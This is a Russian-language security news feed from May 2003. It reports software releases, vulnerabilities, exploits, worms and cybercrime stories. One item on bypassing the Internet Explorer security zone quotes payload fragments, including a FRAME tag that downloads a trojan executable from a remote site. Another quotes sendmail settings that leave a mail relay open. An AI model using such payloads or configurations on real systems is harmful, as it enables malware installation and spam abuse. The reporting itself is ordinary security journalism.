Проект Mozilla выпустил очередную версию своего "многоименного" браузера Mozilla Firebird версии 0.6 под названием Glendale. Был перепроектирован диалог Preferences. В "Закладках" ("Bookmarks") появились контекстные подменю. Также были реализованы автоматическое масштабирование изображений, не помещающихся в окне браузера и плавная прокрутка, добавлены Talkback и предварительная поддержка Mac OS X. Кстати теперь по умолчанию используется изумительная тема основанная на Qute. Ну и конечно же исправлено огромное количество ошибок замеченных в прошлой версии. Подробности - http://www.mozilla.org/projects/firebird/release-notes.html
18/05/2003 11:34 Советы Microsoft по обеспечению безопасности WLAN.
Майкл Ховард опубликовал анонс о выпуске корпорацией Microsoft рекомендаций по обеспечению безопасности беспроводных сетей (WLAN) под названием "Solution for Securing Wireless LANs". В руководстве рассказывается о планировании построения WLAN, использовании PKI и RADIUS, а также управлением всеми этими компонентами. Документ - http://go.microsoft.com/fwlink/?LinkId=14843
18/05/2003 11:17 Демонстрация уязвимости, позволяющей обойти зону безопасности IE.
Автор уязвимости, обнаруженной в IE и позволяющий в результате многочисленного флуда обойти зону безопасности IE (http-equiv@excite.com), опубликовал в Интернете страницу, демонстрирующую указанную уязвимость. В результате обращения страницы формируются множественные запросы на загрузку файла malware.exe. Демонстрация - http://www.malware.com/forceframe.html
18/05/2003 10:40 Эксплоит уязвимости в WinXP.
Ранее мы сообщали об уязвимости, обнаруженной в explorer.exe ОС WinXP. Einstein из российской команды domain HELL team опубликовал исходник на Cи для платформы Win32, представляющий собой эксплоит этой уязвимости. Исходник - http://www.security.nnov.ru/files/explorerex.c
18/05/2003 09:44 Panda Software предлагает средство для обнаружения и удаления червя Fizzer .
Компания Panda Software, ведущий европейский разработчик антивирусного ПО, выпустила специальную утилиту PQREMOVE, которая позволяет устранять любые негативные последствия, вызванные заражением Fizzer (W32/Fizzer). Загрузить данную программу можно абсолютно бесплатно с веб сайта компании. В настоящее время Fizzer – второй по счету в списке вирусов, наиболее часто обнаруживаемых онлайновым сканером Panda ActiveScan. Для предотвращения случаев заражения Fizzer компания Panda Software советует пользователям очень осторожно обращаться со всеми получаемыми сообщениями. Padna уже выпустила обновления для своих продуктов, которые позволяют антивирусам обнаруживать и уничтожать Fizzer. Появившийся 8 мая Fizzer распространяется, в основном, по электронной почте. После заражения компьютера он использует свой собственный SMTP механизм для отправки электронных сообщений по всем адресам из адресной книги Windows. Кроме того, он перехватывает данные, вводимые с клавиатуры на зараженном компьютере, и завершает активные в памяти процессы, что может привести к остановке работы некоторых программ (в основном, антивирусных) Скачать - http://www.pandasoftware.com/download/utilities/
18/05/2003 09:19 В "Матрице-2" взлом осуществлялся при помощи сканера NMAP.
В списке рассылки nmap-hackers Fyodor, создатель знаменитого (и, пожалуй, лучшего) сканера Nmap описывает, как он сходил на премьеру фильма "Матрица-2", также известного под названием "Matrix:Reloaded". Когда дело дошло до взлома некоторого сайта небезызвестной Тринити, автор с удивлением обнаружил (по его словам) не некую абстрактную "Hackers"-esque 3D animated "hacking scene", а до боли знакомый Nmap, при помощи которого осуществлялось сканирование системы. После нахождения открытым 22-го порта (ssh), та же Тринити начинает атаку на ssh-протокол. После того, как Fyodor увидел такую сцену, он, по его словам, подпрыгнул в кресле и начал танец под названием "r00t dance" прямо в кинотеатре. :))) Судя по всему, создателей нового культового фильма консультировал человек, достаточно неплохо разбирающийся в технологии взлома. :) Кстати, автор просит прислать ему скриншоты этой сцены. Так что, если они у кого-то есть, либо есть возможность выдрать их с CD-версии фильма - присылайте. ;) Подробности - http://lists.insecure.org/lists/nmap-hackers/2003/Apr-Jun/0010.html
17/05/2003 14:41 Уязвимость в ядрах Linux.
Как сообщается на сайте Secunia, обнаружена уязвимость в ядрах Linux версии 2.4. Наличие этой уязвимости позволяет удалённо повесить сервер (DoS). Уязвимость присутствует в механизме кэширования информации о маршрутах. Если флудить сервер большим количеством пакетов с подменёнными IP-адресами, при попытке кэширования происходит исчерпание ресурсов процессора, что, в дальнейшем, и приводит к Denial of Service. Как написано в описании, в основном уязвимости подвержены системы, использующие в качестве фильтра пакетов iptables (netfilter). Red Hat выпущена новая RPM-версия ядра для всех дистрибутивов. Также уязвимость устранена в версии ядра 2.4.21-rc2, доступного с сайта kernel.org. Подробности - http://www.secunia.com/advisories/8786/
17/05/2003 13:57 Очередной выпуск Crypto-Gram.
Как сообщает bugtraq.ru, вышёл очередной номер журнала, посвящённого вопросам криптографии Crypto-Gram. В выпуске: Encryption and Wiretapping, Crypto-Gram Reprints, News, Counterpane News, Security Notes from All Over: Receipts, Unique E-mail Addresses and Spam, Comments from Readers. Очень интересна первая публикация (Encryption and Wiretapping). Согласно американскому законодательству, если во время осуществления прослушивания правоохранительные органы сталкиваются с шифрованием и это не дает им возможности получить доступ к необходимой информации, они должны сообщать об этом в ежегодном отчете. Подробности - http://www.counterpane.com/crypto-gram-0305.html
17/05/2003 13:05 Северная Корея готовит 100 хакеров в год.
Северная Корея ежегодно готовит около сотни хакеров, чтобы повысить свои шансы в кибер-войне против Южной Кореей, сообщает Reuters со ссылкой на командующего подразделением по защите информационной безопасности Сеула (Seoul's Defense Security Command) Сонг Янг-кю (Song Young-keun). По словам Янг-кю, Южная Корея создала у себя сложную интернет-инфраструктуру, и это делает её уязвимой для кибер-атак. С другой стороны, северокорейские военные намерены построить эффективную систему безопасности, которая не позволит хакерам из Южной Кореи проникнуть в интернет-секреты коммунистов. Как отмечет Reuters, сетевые ресурсы Южной Кореи, где 70 процентов домов оснащены Интернетом, впервые подвергаются действительно серьезной угрозе со стороны северного соседа. Источник - http://www.lenta.ru
17/05/2003 12:15 Статья "Проверка целостности системы с помощью tripwire".
Ранее мы сообщали о статье, посвящённой описанию работы с системой проверки целостности файлов tripwire. Та статья была на английском языке. 14 мая на сайте www.securitylab.ru опубликована статья на русском языке под названием "Проверка целостности системы с помощью tripwire". Статья - http://www.securitylab.ru/?ID=37803
17/05/2003 12:07 Из нового Outlook можно будет отправлять SMS.
Софтверный гигант решил больше не игнорировать сервис отправки коротких сообщений на мобильные терминалы. Уже в следующую версию Office 2003 войдет программа для отправки SMS. Предварительно Microsoft договорилась со шведской General Wireless. По условиям договора, Office 2003 будет включать в себя новинку - SMS Executive. Ее единственной функцией будет отправка коротких сообщений на телефоны абонентов. При этом, разработка будет функционировать не как самостоятельное приложение, а как новый сервис в почтовом клиенте Outlook. После установки плагина на стандартной панели Outlook появится дополнительная кнопка - "New SMS". Нажав ее, пользователь получит возможность набрать послание тем же путем, что и обычное почтовое сообщение. Более того, для работы можно будет использовать стандартную адресную книгу Outlook. Источник - http://www.generalwireless.se/documents/popup_news14.htm
17/05/2003 12:04 "Центр американского английского" лишился домена.
Вчера, 15 мая 2003 г., в базе данных РосНИИРОС был изменен статус домена AMERICANCENTER.RU, принадлежащего скандально известному "Центру американского английского". На настоящий момент запись выглядит следующим образом: domain: AMERICANCENTER.RU type: CORPORATE descr: Domain for ANO Center Americanskogo angliskogo descr: WWW and MAIL support admin-o: ACAA-ORG-RIPN nserver: dns1.zenon.net. nserver: dns2.zenon.net. created: 2002.11.26 state: Not delegated changed: 2003.05.15 mnt-by: ZENON-MNT-RIPN source: RIPN О причинах изменения статуса пока неизвестно. "Центр американского английского" получил известность как один из самых наглых и циничных спамеров, чья деятельность даже вызвала организованные акции протеста со стороны разгневанных пользователей Интернета. Источник - http://www.provider.net.ru
17/05/2003 11:59 ФБР считает, что наиболее активны хакеры из стран бывшего СССР.
По статистике американского Института компьютерной безопасности (Computer Security Institute), в 2002 году около 90% компаний США подверглись компьютерным атакам и примерно 80% из них понесли ущерб в результате этих действий. Злоумышленники имели различные цели - от безобидных до крайне опасных с большим материальным ущербом. Несмотря на то, что хакерами называют всех злоумышленников, покушающихся на компьютерные сети, все из них обладают разными возможностями и навыками, и ущерб от их деятельности также различный. Специалист по вопросам информационной безопасности Нил Дэвис считает, что наиболее многочисленны, но наименее опасны хакеры-любители. На их долю приходится до 80% всех компьютерных атак. Но этих людей интересует не некая цель, а сам процесс атаки. Они испытывают удовольствие от взлома систем защиты. Чаще всего их действия удается легко пресечь, поскольку хакеры-любители предпочитают не рисковать и не вступать в конфликт с законом. Более опасны хакеры-изменники, которые выдают себя за преданных сотрудников компании. На их долю приходится примерно 3-5% компьютерных атак. Примерно 10% компьютерных атак совершают члены организованных преступных сообществ - хакеры-киберпреступники. Эксперты ФБР считают, что ныне наиболее активны "киберпреступники" из бывшего СССР и государств Восточной Европы. Единственная цель этих хакеров - получение прибыли. Поэтому их мишенью становятся банки, финансовые и торговые компании. Подробнее - http://www.crime-research.org/news/2003/05/1502.html
16/05/2003 15:54 SCO разослала пользователям Linux черную метку.
SCO Group, финансово неблагополучная компания, утверждающая, что ее интеллектуальная собственность незаконно используется в Linux, разослала почти 1500 крупнейшим корпорациям мира письмо с предупреждением о возможном судебном преследовании за использование Linux. Этот шаг расширяет круг потенциальных ответчиков далеко за пределы первоначального объекта преследования — корпорации IBM. SCO подала иск на своего лицензиата IBM в марте этого года, потребовав компенсации в размере, превышающем 1 млрд $, — в числе прочего за несанкционированное использование коммерческих секретов Unix для совершенствования Linux. «Мы считаем необходимым предупредить коммерческие компании, что у Linux есть проблемы с интеллектуальной собственностью, — сказал в интервью Крис Зонтаг, возглавляющий проект SCO по извлечению новых доходов из интеллектуальной собственности компании. — Мы разослали письмо всем фирмам Fortune 500 и многим фирмам global 2000. В результате получилось около 1500 крупнейших в мире компаний». «Мы убеждены, что Linux нарушает нашу интеллектуальную собственность, связанную с Unix, и другие права, — говорится в письме. — Мы намерены активно защищать и утверждать наши права. Юридическая ответственность, вытекающая из процесса разработки Linux, может ложиться и на конечных пользователей». Подробности - http://www.zdnet.ru/?ID=300869
16/05/2003 14:40 Статья о коммутаторах.
Благодаря Rend-у c форума RTFM на сайте www.sysadmins.ru Обнаружена ссылка на статью "Коммутаторы Ethernet. Начальные сведения", автором которой является Николай Малых из BiLiM Systems Ltd. Рекомендуется к ознакомлению интересуюшимся сетевым оборуованием. Cтатья - http://www.citforum.ru/nets/switche/index.shtm
16/05/2003 13:34 Новый хакерский инструмент — лампочка Говиндавайхалы.
Лампа, некоторые известные свойства компьютерной памяти и немного удачи позволили студенту Принстонского университета вскрыть пробел в защите виртуальных машин Java и .Net. Для атаки требуется физический доступ к компьютеру, так что данный метод мало угрожает виртуальным машинам, установленным на ПК и серверах. Зато с его помощью можно красть данные из смарт-карт, утверждает студент-выпускник факультета вычислительной техники Принстона Судхакар Говиндавайхала, продемонстрировавший во вторник эту процедуру, представляя свою работу на симпозиуме по безопасности и защите частной информации Института инженеров по электротехнике и электронике (IEEE). «Некоторые смарт-карты, использующие Java, достаточно облучить светом, немного потрясти — и вы получите доступ к данным», — сказал он. В основе метода лежит способность энергии «выбивать биты» в памяти. Иногда, очень редко, изменение значения произвольных битов с «0» на «1» и с «1» на «0» вызывает космические лучи, но Говиндавайхала решил не ждать. Он вызывает изменение значения одного-двух битов, нагревая чипы внутри компьютера при помощи лампы. При этом нарушается модель защиты, на которую опираются виртуальные машины: она подразумевает, что компьютер выполняет инструкции безошибочно. «Песочница разбивается», — поясняет Говиндавайхала. Источник - http://www.zdnet.ru/?ID=300743
16/05/2003 12:17 Безопасные SMS-сообщения.
Компания RSA Security представила новое средство аутентификации владельцев мобильных телефонов. Первые упоминания о технологии RSA Mobile появились еще осенью 2002 г., но до последнего времени RSA не слишком распространялась об этом продукте. Система аутентификации работает в два этапа. Сначала в работу вступает приложение на языке J2EE, работающее на веб-сервере. Оно генерирует уникальный код, используя в качестве исходной информации имя пользователя, пин-код и номер телефона. Полученный код высылается обратно в виде SMS. Подробности - http://www.theinquirer.net/?article=9499
16/05/2003 11:19 Хакеры атакуют американских военных.
По данным Министерства Обороны США в 2002 году было зафиксировано 45 тыс. хакерских атак на военные сети США. В 1999 году их было вдвое меньше - 22 тыс. Подавляющее большинство случаев было "проверкой на прочность" систем защиты. Столкнувшись с кибербарьерами, хакеры предпочитали не рисковать и не пытались взломать их. Однако примерно 200 раз хакеры пытались получить контроль над военными серверами, несколько сот раз они атаковали военные сети США с помощью компьютерных вирусов. Также было зафиксировано 46 случаев попыток взлома интернет-сайтов. Вторжения в военные сети США в 2002 году составили более трети общего числа кибератак, проведенных на американские сети. По подсчетам Carnegie-Mellon's CERT Coordination Center коммерческие и образовательные сети США в 2002 году подвергались атакам хакеров более 82 тыс. раз. Специалисты Министерства Обороны США, опрошенные газетой Defense News, считают, что успешное проникновение посторонних в военные компьютерные сети США маловероятно, поскольку их защиту обеспечивают слишком много высококлассных специалистов. Значительно более вероятны атаки компьютерных вирусов, "червей" и "Троянских коней". Иногда подобные программы создаются специально для одной атаки, и системы компьютерной безопасности иногда не в состоянии идентифицировать их. Успешные взломы военных и правительственных сайтов США не говорят о реальном положении дел. Эти сайты находятся на отдельных серверах, не включенных во внутренние сети, а их качественная защита, как правило, не находится в числе приоритетов служб компьютерной безопасности. Более того, некоторые известные военные сайты используются в качестве "подсадных уток" для хакеров: сотрудники службы безопасности следят за тем, какую тактику, какие средства применяют хакеры и пытаются идентифицировать киберпиратов. Подробнее - http://www.internet.ru/lentanews/n_te62.esp
16/05/2003 10:10 Выход GCC 3.3.
Как сообщает linux.org.ru, вышел следующий функциональный релиз колекции компиляторов GNU - 3.3. Убрано большое количество устаревших фич, добавлен DFA планировщик, улучшена поддержка ISO C99, других языков (С++, Objective-C, Java, Fortran, Ada), а также добавлено/улучшено много чего другого. Подробности - http://gcc.gnu.org/gcc-3.3/changes.html
16/05/2003 09:05 RIAA рассылает провайдерам необоснованные обвинения в пиратстве.
Американская ассоциация звукозаписывающих компаний (RIAA) в очередной раз привлекла к себе всеобщее внимание. На этот раз причиной тому послужила необоснованная отправка 24 предупреждений о нарушении закона об авторском праве нескольким провайдерам и учебным заведениям США. В этих предупреждения содержались требования убрать с компьютеров, входящих в университетские или провайдерские сети, музыкальные файлы, которые RIAA считает пиратскими. Для поиска пиратской музыки RIAA использует некую автоматическую систему, подробности о которой неизвестны. Скорее всего, она напоминает поисковик, заточенный под поиск музыкальных файлов с композициями, права на распространение которых принадлежат участникам ассоциации. В соответствии с действующим законодательством, всем коммерческим провайдерам и учебным заведениям, в чьих сетях обнаруживается музыка, RIAA рассылает требования убрать пиратский контент. В ходе одной из таких рассылок и была допущена ошибка - требования убрать пиратскую музыку были направлены 24 ни в чем не повинным организациям. Обнаружив недоразумение, RIAA принесла извинения всем пострадавшим и обещала наказать виновного в происшедшем, которым оказался один из временных сотрудников ассоциации. Источник - http://news.com.com/
15/05/2003 14:06 Знакомство с Tripwire.
Наверняка, большинство СИСАДМИНов Linux-серверов знакомы с пакетом tripwire - системой контроля целостности файлов, основанной на контрольных суммах. В апрельском номере электронного журнала Linux Productivity Magazine редактор, Steve Litt, написал большую статью, посвящённую установке, конфигурированию и работе с программой tripwire. Прочитав статью, надеемся, Вы найдёте для себя много полезных советов по организации работы tripwire. Cтатья - http://www.troubleshooters.com/lpm/200304/200304.htm
15/05/2003 13:01 Уязвимости во многих IMAP-клиентах.
Timo Sirainen сообщает об уязвимостях во многих IMAP-клиентах, написанных на C, C++. Уязвимостей 2: первая связана с некрректной обработкой литералов (literal) функцией malloc, вторая связана с некорректной обработкой почтовых ящиков огромных размеров (также используется функция malloc для размещения данных в памяти). Поведение различных клиентов при проведении атаки - различно. Некоторые просто падают, в других существует возможность выполнения произвольного кода в пространстве памяти процесса. Приведём список уязвимых клиентов: imap-2002, Pine, Evolution, Mozilla, mutt, Balsa, Sylpheed, Outlook Express, Eudora. Для некоторых клиентов выпущены новые версии, в которых уязвимости нет. Для успешного проведения атаки необходимо, чтобы клиент соединился со специально "настроенным" IMAP-сервером. Для более детального ознакомления с уязвимостью и полным перечнем уязвимых клиентов и их версий, а также особенностях уязвимости в них, рекомендуется посетить приведённую ниже ссылку с полным описанием. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0157.html
15/05/2003 12:21 Уязвимость в PalmOS.
Ну вот уязвимости добрались и до "маленьких" ОС. Shaun Moore обнаружил, что при приёме большого количества ICMP-пакетов типа ICMP_ECHO (тип 8) ресурсы процессора исчерпываются и система становится недоступной. Ресурсы исчерпываются по причине попыток ответить на шторм ICMP-ECHO пакеты. Для восстановления необходима перезагрузка, однако, если злоумышленник будет продолжать ICMP-DoS атаку подобная ситуация внось возникает. Автором написан эксплоит, автоматизирующий процесс атаки, так как пакеты посылаются постоянно, без ожидания приёма эхо-ответов. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0154.html
15/05/2003 11:48 IBM поставляет почтовые системы своих ОС с открытым релэем.
В своём постинге BUGTRAQ Tom E. Perrine из Центра суперкомпьютеров Сан-Диего ( San Diego Supercomputer Center - SDSC ) пишет, что версии sendmail, поступающие в составе ОС, поддерживаемой IBM - AIX, cодержат конфигурационный файл sendmail.mc (предназначен для конвертации в файл sendmail.cf при помощи препроцессора m4), оставляющим открытым релэй. Понятие открытый релэй (RELAY) означает в почтовых системах, что почтовый сервер может быть использован машинами другой сети для переправки почты. Открытые релэи зачастую используют спаммеры для пересылки своей "почты". В процессе долгой работы с AIX Том обнаружил, что во всех версиях этой ОС в файле sendmail.mc содержатся строки, оставляющие релэй открытым для всего мира - FEATURE(promiscuous_relay)dnl, FEATURE(accept_unresolvable_domains)dnl, FEATURE(accept_unqualified_senders)dnl. Самое примечательное, что во всех новых версиях sendmail и патчей к ней этот файл неизменно затирает все предыдущие настройки пользователя. Подобная ситуацяи продолжается ещё с 1999 г. Многочисленные обращения в IBM не привели ни к какому результату. Подробности - http://security.sdsc.edu/advisories/2003.05.13-AIX-sendmail.txt
15/05/2003 11:09 Очередной семинар Softline.
Компании SoftLine и "ДиалогНаука" приглашают Вас 20 мая принять участие в БЕСПЛАТНОМ семинаре "Новые антивирусные продукты Dr.Web - для частных и корпоративных пользователей". Семинар будет посвящен современным решениям компании "ДиалогНаука" для различных категорий пользователей. Участникам будет представлен обзор продуктовой линейки компании "ДиалогНаука", а также описание возможностей и назначения компонентов, входящих в пакет антивирусных программ семейства Dr.Web для обеспечения антивирусной защиты рабочих станций в корпоративных сетях. Представители компании "ДиалогНаука" расскажут об основных изменениях, произошедших во второй BETA-версии пакета централизованного управления системой антивирусной защиты в рамках предприятия Dr.Web- Enterprise Suite. Особое внимание будет уделено изменениям в политике лицензирования антивируса Dr.Web - для почтовых серверов. Начало регистрации в 9.30. Место проведения: Математический Институт им.Стеклова по адресу: г.Москва, ул. Губкина, 8. Регистрация - http://www.softline.ru/seminar.asp?...
15/05/2003 10:49 Уточнения к технике обхода зоны безопасности IE.
Ранее мы писали о технике, при помощи которой можно обойти зону безопасности Internet Explorer и загрузить ЛЮБОЙ файл в ЛЮБОЕ место дискового пространства, используя множественные запросы (~200) на загрузку файла с файл сервера при помощи формирования URL-запроса file://. Marek Bialoglowy (автор) из индонезийской фирмы System Integra, проработа различные нюансы атаки уязвимости, выпустил обновлённое описание. Из него следует, что совсем не обязательно формировать запрос file:// - также будут работать запросы типа ftp:// и http://. В первом документе автор писал, что в основном техника применима только в локальной сети, однако сейчас он описал технику для применения загрузки файла через Интернет. Для этого предлагается формировать 191 запрос вида > FRAME SRC="C:\winnt\welcome.exe" <, после чего (предполагается, что в результате этих запросов зона безопасности уже будет забита запросами) сформировать запрос на сайт в Интернете, на котором проживает троян - > FRAME SRC="http://www.systemintegra.com/trojan.exe" <. Таким образом троян загружается уже из файла в Интернете. Также автор пишет, что детальную технику он описывать не будет, посколько она могла бы быть использована авторами сетевых червей. Также Марек пишет, что описаннная им техника работает для Win2K, однако он имеет рабочий эксплоит и для машин под управлением WinXP. К письму был приаттачен файл dmz5-win2k.zip, реализующий описанную уязвимость. Ниже приведена ссылка на подробное описание уязвимости. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0159.html
15/05/2003 10:02 Программа для анонимности в Интернет.
Вашему вниманию предлагается ещё одна из программ для анонимности в Интернет под названием Anonymity 4 Proxy. Недавно вышла новая версия - v2.52. Позволяет одним кликом менять прокси, тестировать прокси-сервера на доступность, анонимность, создавать свой набор правил и многое другое. После установки программы необходимо прописать в свойствах IE новый IP-адрес: 127.0.0.1 (address of the proxy server to use) and 80 (port number). Программа содержит неплохой help, в котором все очень подробно расписано. Как видно из расширения упакована архиватором ACE. Cкачать - http://homepages.pathfinder.gr/coolbeer/A4Proxy%202.52%20Retail.ace
15/05/2003 09:31 Ещё одно переполнение буфера в Opera.
Как стало известно с bugtraq.ru, браузер Opera версий 7.10 build 2840 и 7.03 build 2670 (Windows), а также 7.1.0 Beta 1 build 388 (Linux) некорректно обрабатывает расширения длинных имен файлов, в результате чего возможно устроить DoS-атаку или выполнить произвольный код. Разработчик уведомлен, выпущена нновая версия (7.11). Тем не менее, хотелось бы обратить внимание, что мы вчера мы писали об уязвимости в компоненте JVM, с которой идёт версия Opera 7.11j. Подробнее - http://www.securiteam.com/securitynews/5XP0J0KA0G.html
15/05/2003 09:17 Хакеры ополчились на банковский сектор
Как показало новое исследование, хакерские атаки, которым подвергается финансовый сектор, становятся все более изощренными: за последний год более трети банков и компаний, оказывающих финансовые услуги, обнаружили "дыры" в своих системах информационной безопасности. Согласно новому обзору мирового сектора финансовых услуг, проведенному консалтинговой компанией Deloitte Touche Tohmatsu (DTT), из 39% компаний, обнаруживших уязвимости в своих системах безопасности, 16% зафиксировали хакерские атаки извне, 10% - внутренние "бреши" и 13% - и то, и другое. По словам специалистов DTT, данные цифры развенчивают миф о том, что самой большой угрозой безопасности компании являются ее собственные сотрудники. "Это не просто деятельность осведомителей внутри компании, - заявил Саймон Оуэн (Simon Owen), партнер, отвечающий DTT за риски в секторе финансовых услуг. - Мы видим большее количество изощренных атак и высокий уровень "интеллектуальных" атак, объединяющих сами атаки и возможность заранее получать доступ к большим объемам информации". Для своего обзора специалисты DTT опросили 175 старших ИТ-менеджеров. Источник - http://www.cnews.ru
14/05/2003 17:02 Новая версия makeunicode2.py.
Dave Aitel из Immunity, Inc. анонсировал выход второй версии (v2.0) makeunicode2.py - модуля на языке Python, позволяющего разработчиков легко и просто генерировать юникод из любого шелл-кода для проверки Unicode-уязвимостей, например, для проверки Microsoft Content Server. Подробнее - http://www.immunitysec.com/CANVAS/
14/05/2003 16:40 Уязвимость в WinXP SP1.
В списке рассылки vuln-dev@securityfocus.com завязалась довольно любопытная дискуссия, начало которой было положено опубликованием исходника, созданного aT4r InsaN3. Исходник, якобы вызывает переполнение буфера в explorer.exe ОС WinXP SP1 - при просмотре содержимого жёсткого диска, содержащего откомпилированный файл. Как выяснилось, эксплоит создаёт файл /aT4r[at]3WDesign.es Security/desktop.ini. При этом (как писалось выше) при вызове просмотра директории explorer зависает. Дальнейший анализ выявил, что помещение, например подобного файла в \temp\desktop.ini вызывает зависание не только explorer.exe, но и Internet Explorer при попытке просмотра содержимого диска. Peter Huang выяснил, что причина уязвимости находится в shell32.dll в которой предполагается, что длину буфера ограничена двумя 800h. При вызове строки большей длины и возникает переполнение. Однако из-за преобразования переполняющей строки в Unicode запустить свой код в пространстве памяти процесса довольно трудно (если и не невозможно). Об язвимости shell32.dll в других ОС авторам ничего не известно. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0133.html
14/05/2003 15:12 Электронная акция против клиентов банка First Union.
Комбинация троянца, обеспечивающего удаленный доступ к системе, технологий "социального инжиниринга" и нежелательные рассылки по электронной почте - все это составляющие части акции, направленной против клиентов банка First Union в США. Злоумышленники разослали электронное сообщение от имени банка First Union. В данном сообщении указано, что банк утерял имена пользователей и их пароли и предлагается зайти на веб сайт и ввести соответствующую информацию. Однако, при посещении данного сайта на компьютер загружается вышеупомянутый троянец, что предоставляет атакующему полный доступ к компьютеру жертвы. Хитрость этой акции заключается в использовании различных технологий: спам, "социальный инжиниринг" и троянец для похищения конфиденциальной информации. Так что будьте осторожны, получив письмо якобы от заслуживающего доверия источника с просьбой повторно указать конфиденциальную информацию. Источник - http://www.crime-research.org
14/05/2003 14:06 Правая кнопка мыши опасна для компьютера.
Microsoft преподнесла очередной "подарок" пользователям операционной системы Windows XP. Как выяснилось, каждое нажатие правой клавиши мыши в Explorer таит опасность для работы компьютера. По сообщению The Inquirer, в Microsoft официально признали наличие еще одной ошибки в последней версии операционной системы - Windows XP. Как показали данные тестирования работы ПК, при нажатии правой кнопки мыши в браузере Windows Explorer по факту выпадения контекстного меню резко подскакивает коэффициент использования процессорного времени, - загрузка в некоторых случаях достигала 100%. Это может стать причиной временного зависания компьютера, что отражается на комфортности работы в Сети и на работе активных мультимедиа-приложений. Данная проблема актуальна для любых версий Windows XP, даже если на ПК установлены сервис-паки SP1 и SP1a. Несмотря на наличие ошибки, в Microsoft не склонны считать ситуацию критической. Для решения проблемы достаточно отключить для выпадающих меню опцию "transition effects". Еще один совет по избежанию стопроцентной загрузки процессора: удерживать левую кнопку мыши при нажатии правой. Радует, что других манипуляций при этом проводить не нужно. Источник - http://www.runet.ru
14/05/2003 13:41 Пермский "хакер" получил 2,5 года тюрьмы.
Уровень компьютерной грамотности отечественных пользователей иногда опускается настолько низко, что вред их ПК могут нанести самые примитивные вредоносные программы. С их помощью новоиспеченные компьютерные гении даже пытаются вымогать деньги, как это сделал "хакер" из пермских Березников. 12 мая прошло очередное заседание березниковского городского суда по делу Порублева А.М., в отношении которого в июне 2002 года было возбуждено уголовное дело по ст. 273 УК РФ "Создание, использование и распространение вредоносных программ для ЭВМ". Несмотря на примитивизм созданной гражданином Порублевым программы, постановление суда было очень строгим. Как передает Regions.ru со ссылкой на "Верхнекамское агентство новостей", программа, написанная на BASIC, крайне примитивна: отправленная по электронной почте, она пытается удалить все файлы в ряде крупных каталогов. Порублев, который уже имеет судимость, пытался с ее помощью заработать около 20 тысяч рублей. Приговор суда определил "хакеру-шатажисту" уголовное наказание в виде лишения свободы сроком 2,5 года. Это первый случай осуждения компьютерного преступника в Пермской области. Источник - http://www.runet.ru/news/3005.html
14/05/2003 13:08 "Большого Брата" разрешат отключать.
Как отличить обычную информацию от информации засекреченной, личной? Microsoft предлагает решать проблему в лоб: информация, защищенная комплексом мер Next-Generation Secure Computing Base (ex-Palladium), будет визуально отличаться от обычной информации. Например, окно приложения, в котором содержится конфиденциальная информация, будет иметь особые края, по которым будут ползать введенные самим пользователем клички всех живших у него собак (это не мы, это придумали в Microsoft, честно). Подразумевается, что хакер не сможет узнать эти клички, последовательность, в которой они были набраны, и пользователь всегда сможет отличить зашифрованную информацию от подделки. Тем временем, сам Билл Гейтс (Bill Gates) лично утешает общественность: по его словам, NGSCB будет опциональной, пользователи, которым она не нужна, смогут отключать ее по своему желанию. Более того, NGSCB, скорее всего, не будет включена в дистрибутив следующего поколения "настольной" Windows, известной сейчас как Longhorn, а будет предлагаться отдельным апдейтом. Впрочем, в Microsoft не исключают внедрения средств NGSCB в последующие, выходящие после Longhorn версии Windows. Интересно, однако, как отнесутся к таким новостям главные сторонники повсеместного внедрения NGSCB - американские ассоциации производителей музыкальной и кино продукции (RIAA и MPAA)? Похоже, у них из рук опять уплывает вожделенная возможность на уровне "железа" запретить пользователю копировать легально приобретенные им продукты... Подробнее - http://news.com.com/2100-1012_3-1000584.html
14/05/2003 12:35 Второе пришествие червя "Lovgate".
"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакеров и спама, сообщает об обнаружении сразу пяти новых модификаций интернет-червя Lovgate, впервые обнаруженного в конце февраля 2003 г. На данный момент уже зарегистрировано несколько случаев заражения компьютеров этой вредоносной программой в Японии. По своей сути новые модификации червя, получившие индексы "H", "I", "J", "K" и "L", ничем не отличаются от своих семи предшественников. "Lovgate" распространяется по электронной почте и локальным сетям. Заражение происходит, только если пользователь самостоятельно запустит файл-носитель червя, присланный в виде вложения или скопированный на открытые сетевые ресурсы компьютера. В дополнение "Lovgate" устанавливает в зараженной системе программу-шпиона, которая позволяет злоумышленникам незаметно управлять компьютером, что может привести к утечке конфиденциальной информации. Отличие новых модификаций состоит исключительно в реализации описанной вредоносной функциональности. Автор червя переработал исходные тексты "Lovgate" и заново скомпилировал исполняемые модули. Таким образом, при сохранении функциональности внешний вид червя изменился. Подробности - http://www.viruslist.com/index.html?tnews=1001&id=2274266
14/05/2003 11:32 Выход Fluxbox 0.9.2.
Вышла новая бета популярного менеджера окон для *nix-ОС Fluxbox. Из нового: прозрачное меню, направленное перемещение фокуса, новые навороты в темах, исправления ошибок. Подробности - http://fluxbox.sourceforge.net/version-0.9.php
14/05/2003 11:14 Уязвимость в eServ.
Matthew Murphy сообщает об уязвимости в eServ - приложении, представляющем собой Вэб-сервер, FTP-сервер, почтовый сервер (SMTP, POP3, finger), ньюс-сервер и прокси в одной упаковке. Разрабатывается нашим соотечественником Андреем Черезовым. Было обнаружено, что при попытке соединения с сервером он размещает блок памяти в куче от 8 до 32 КБайт. Однако при освобождении соединения память не освобождается, что приводит к её постепенной утечке. Организовав несколько тысяч соединений, удалённый злоумышленник может полностью исчерпать всю память сервера и сделать его неработоспособным. В результате тестов было выяснено, что при 1000 соединений теряется от 7.81 MB до 31.25 MB, после 10,000 - от 78.1 MB до 312.5 MB. 50,000 соединений привело к полной неработоспособности сервера из-за утечки памяти от 390.5 MB до 1.52 GB. Автором написан эксплоит на Перле. Подробности - http://www.securiteam.com/windowsntfocus/5IP0E0AA0K.html
14/05/2003 10:05 Уязвимость в Opera 7.11.
